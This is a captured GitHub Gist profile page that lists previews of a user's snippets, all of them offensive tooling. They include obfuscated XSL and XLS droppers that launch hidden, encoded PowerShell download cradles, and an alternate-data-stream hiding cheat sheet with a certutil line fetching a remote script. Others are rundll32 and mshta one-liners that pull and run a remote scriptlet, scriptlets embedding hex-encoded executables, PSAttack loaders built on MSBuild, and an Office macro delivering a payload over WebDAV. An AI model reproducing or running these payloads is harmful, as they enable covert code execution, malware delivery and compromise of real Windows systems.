Skip to content

Instantly share code, notes, and snippets.

View cryptonic01's full-sized avatar
🚪
Out...

Cryptonic cryptonic01

🚪
Out...
11 followers · 33 following
  • Raşşa
View GitHub Profile
@cryptonic01
cryptonic01 / do.jse
Last active June 12, 2018 22:05
#@~^fwcAAA==7 dUhi dzmDr\(64N+^OvJU^I&nKcju+^Sr# IiUvd dEEnKh3.kC+ssc2a2r7 d7 Pqo+:d 7`]mul"T77,!(+0diPdi~QdiP]Zub]Did~!X{cid~7iP_77,$^tm]Yd7,!oGcid,7d,_7d,$/4zITi7PZ6GZ77Pid,_7d~,1tCDY7d,!a{2dd~7iPQdi~]Z4mDYdd,!Xfbid~diPQ7iP$;4bMTdi~T(ysid~d7~3d7P]^CmID7iP!a+wd7Pi7,_7iP]mtzIY7d,!avyd7~idP37d,$Z_C.Tid,!pv17iP7d,QdiP,^4bDD7iPT6F*id~id,_diP]/CmDDdiPTp+ di~diP_i7~$;CmIDd7~Z({*i7Pid~QidP,/4b.Ti7,!a+&idPid,QdiP,Z4b.DidPZpv~dd,77P3diP,muCMT7d,T(+*77,dd~Qid~$14zDDid,!6Fci7Pid~_id~,;tlMDdiP!o+3diPid~_77,$^tm]Tid~Tovs77,d7P37iP,;CzDTid,T(F 7d,d7~3dd,,m4bDY77PZ(+G7d~7iPQdi~$1t)]Ydd~TX odi~id~3diP$;tm.Tid~!ovo7iPdi~_idP]^4b"Tid~!p2d7Pi7P3d7~]mCC.Yd7PZaFc7iPidP3di~$1tCDYd7~Z6vw7d,dd,Q7d,$1C)DD7iPT(FTdiP77,_d7~]Z4lMDid~Z(F*diPi7P3d7P]Zu)MTdi~!oG&i7~diP3d7P,/_l.Ti7PZ6{idP77,_7d,,;tCMTidPZ(F+diP7d,_77,$m_CIYdd,TavwdiP7d~Qid~$;4bMT77,!({Xid~di~3d7,$1tb"Ti7PZ({!id~7iP_i7P]mtz]DdiPZ6+s77,d7P37d,$/4zDT77,!av87iP7iP3dd,$;4bMT7d,!p{Zdd,7d,_di~,m_l"T7d~TXG*di~diPQ7iP$/4mDDdi~Z(fydiPdiP37d,$^CmDD7iP!Xf!idPi7~_id,$/C)]Yd7PZp wd
@cryptonic01
cryptonic01 / octopusgorup.xsl
Last active July 17, 2018 15:30
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c powERSHElL.ExE -eX ByPASS -nOP -W HiDDeN -Ec CQAgACAAKAAJACAAIABOAGUAVwAtAE8AQgBKAGUAYwB0AAkADAAgACgAIAAJACAAJwBzAHkAUwBUAGUAbQAuAE4ARQAnACAADAAJACAADAAJACsAIAAMAAkAJwB0AC4AdwAnACAADAAJACAADAAJACsAIAAMAAkAJwBlAEIAYwBMAEkARQBOACcAIAAMAAkAIAAMAAkAKwAgAAwACQAnAHQAJwAgAAwACQAgAAsAIAApACAADAAgACkALgAoACAACwAgACcARABPAHcATgBMAE8AYQBEACcAIAAJACAAIAAJACAAKwAgAAkAIAAnAGYAaQBMAGUAJwAgAAkAIAAJAAsACQApAC4AaQBOAFYAbwBrAEUAKAAgAAkACQAoAFsAYwBoAEEAUgBdAAkACwAgADAAeAA2ADgACQALACAACQALACAAKwAJAAsAIABbAGMASABBAFIAXQAJAAsAIAAwAHgANwA0AAkACwAgAAkACwAgACsACQALACAAWwBDAGgAQQByAF0ACQALACAAMAB4ADcANAAJAAsAIAAJAAsAIAArAAkACwAgAFsAYwBIAEEAcgBdAAkACwAgADAAWAA3ADAACQALACAACQALACAAKwAJAAsAIABbAGMASABhAFIAXQAJAAsAIAAwAFgANwAzAAkACw
@cryptonic01
cryptonic01 / fad.xls
Created July 12, 2018 23:50
<RoOT XMlNS = "gzoprjonlbazvntlokftttscrjabkpkyvgrjzxrandsvlmrhedcywllhtcxxbygqaywgbjgiigrfobxmytqjnuoroufxndunwyimlecdygcjttfswcdegeuwfjdfiqugjdkeqsycjcijowjqadwnozznrszzztbnpmjmfkqwprqllwewitcoaqwhztbjaziypvmosqxctwhradjdy">
<script xmlns = "http://Www.W3.OrG/2000/svG" >
<![CDATA[
new ActiveXObject("wsCRiPT.sheLL").RuN( '"powErsheLL.EXe" POWersHEll.Exe -eX byPASS -NOp -w hIddEN -EC IAAgAAkAKAAgAAkAIABuAEUAdwAtAE8AQgBKAEUAYwB0AAkAIAAJACgAIAAJAAkAJwBzAFkAcwBUAEUATQAuAE4ARQBUAC4AVwBFAEIAJwAJAAsACQAJAAsACQArAAkACwAJACcAYwAnAAkACwAJAAkACwAJACsACQALAAkAJwBMAGkAJwAJAAsACQAJAAsACQArAAkACwAJACcAZQAnAAkACwAJAAkACwAJACsACQALAAkAJwBOACcACQALAAkACQALAAkAKwAJAAsACQAnAHQAJwAJAAsACQAgAAsAIAApACAACQAgACkALgAoAAkAIAAgACcAZAAnAAkAIAAgAAkAIAAgACsACQAgACAAJwBvACcACQAgACAACQAgACAAKwAJACAAIAAnAFcATgBMAE8AQQBkAEYAJwAJACAAIAAJACAAIAArAAkAIAAgACcASQBsAGUAJwAJACAAIAAgAAwACQApAC4ASQBuAFYATwBLAGUAKAAJAAkACQAoAFsAYwBIAEEAUgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANwA0ACAAIAAJACAAIAAJACsAIA
@cryptonic01
cryptonic01 / Exe_ADS_Methods.txt
Created July 13, 2018 01:10 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
@cryptonic01
cryptonic01 / instructions.txt
Created July 13, 2018 01:12 — forked from api0cradle/instructions.txt
xwizard_sct
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
@cryptonic01
cryptonic01 / power.sct
Last active July 13, 2018 01:21
<?XML version="1.0"?>
<scriptlet>
<registration
progid="17807259"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var sBuffer = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030019F6DA580000000000000000E00002010B010B000014000000100000000000009E3200000020000000400000000040000020000000020000040000000000000004000000000000000080000000020000830B0100020040850000100000100000000010000010000000000000100000000000000000000000443200005700000000400000200C0000000000000000000000260000000F0000006000000C0000000C3100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000A4120000002000000014000000020000000000000000000000000000200000602E72737
@cryptonic01
cryptonic01 / dede.sct
Created July 13, 2018 01:22
<?XML version="1.0"?>
<scriptlet>
<registration
progid="17807259"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var sBuffer = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030019F6DA580000000000000000E00002010B010B000014000000100000000000009E3200000020000000400000000040000020000000020000040000000000000004000000000000000080000000020000830B0100020040850000100000100000000010000010000000000000100000000000000000000000443200005700000000400000200C0000000000000000000000260000000F0000006000000C0000000C3100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000A4120000002000000014000000020000000000000000000000000000200000602E72737
@cryptonic01
cryptonic01 / PSA64.cs
Created July 13, 2018 01:30 — forked from NickTyrer/PSA64.cs
PSAttack Using MSBuild Downloader
This file has been truncated, but you can view the full file.
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;
namespace PSA64
{
class Program
{
@cryptonic01
cryptonic01 / PSA_MSBUILD64.csproj
Created July 13, 2018 01:30 — forked from NickTyrer/PSA_MSBUILD64.csproj
PSAttack Using MSBuild Bytestream
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), -->
<!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
<Target Name="PSAttack">
<PSA_MSBUILD64 />
</Target>
<UsingTask
TaskName="PSA_MSBUILD64"
TaskFactory="CodeTaskFactory"
@cryptonic01
cryptonic01 / macro_webdav_delivery.vba
Created July 24, 2018 18:25 — forked from Arno0x/macro_webdav_delivery.vba
Office macro using WedDav mapping to deliver payload
'
' Example of DBC2 msbuild.xml stager delivery through a webdav maping
' The stager file (msbuild.xml) can be generated from the DBC2 controller
'
' NOTE:
' msbuild.exe is supposed to accept a path straight from a webdav server (ex: msbuild.exe \\webdav_server\msbuild.xml)
' but it fails miserably for me, so I have to have to first map the drive...
Sub Go()
Dim cmd As String, srv As String